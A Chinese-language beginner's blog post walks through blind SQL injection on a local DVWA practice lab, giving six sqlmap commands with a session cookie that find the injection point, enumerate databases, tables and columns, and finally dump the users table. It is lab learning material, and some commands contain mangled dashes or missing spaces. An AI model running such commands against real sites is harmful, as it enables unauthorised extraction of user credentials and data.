我的學習之路(一)SQL盲註學習篇
我的學習之路,現在零基礎,是一個小白,請各位大牛批評指正!寫下這篇,是對自己的一個思路的整理,僅供參考。
Dvwa中登錄進入,首先在DVWA Security中設置等級為low,然後進入SQL Injection(blind),隨意輸入一個數字進行抓包,然後找到URL註入點和cookie。(抓包使用的工具為fiddler,在此就不進行詳述抓包過程了)
然後進入cmd界面進行命令參數輸入:
第一步查詢該URL是否可進行註入,命令參數如下:
sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6"
-u參數為指定URL --cookie="cookie值"
結果發現是可以進行註入的。
第二步查看所有的數據庫:
sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –dbs
第三步查看當前用戶:
sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –current-user
第四步查看數據庫dvwa中所有的表:
sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa --tables
第五步查看數據庫中的users表,其中—columns為查看當前表的所有列
sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa –T users--columns
各位經過前面的步驟是不是等的沒有耐心了,哈哈,但是結果出來,還是有成就感的哦。第六步,也就是最後一步,--dump 將所有列的信息都列出來。
sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa –T users--dump
當然,最後一張圖沒有截成完整圖哦,你可以繼續回車的!!
本文出自 “學習之旅思路整理” 博客,請務必保留此出處http://pieshusheng.blog.51cto.com/13106113/1946399
我的學習之路(一)SQL盲註學習篇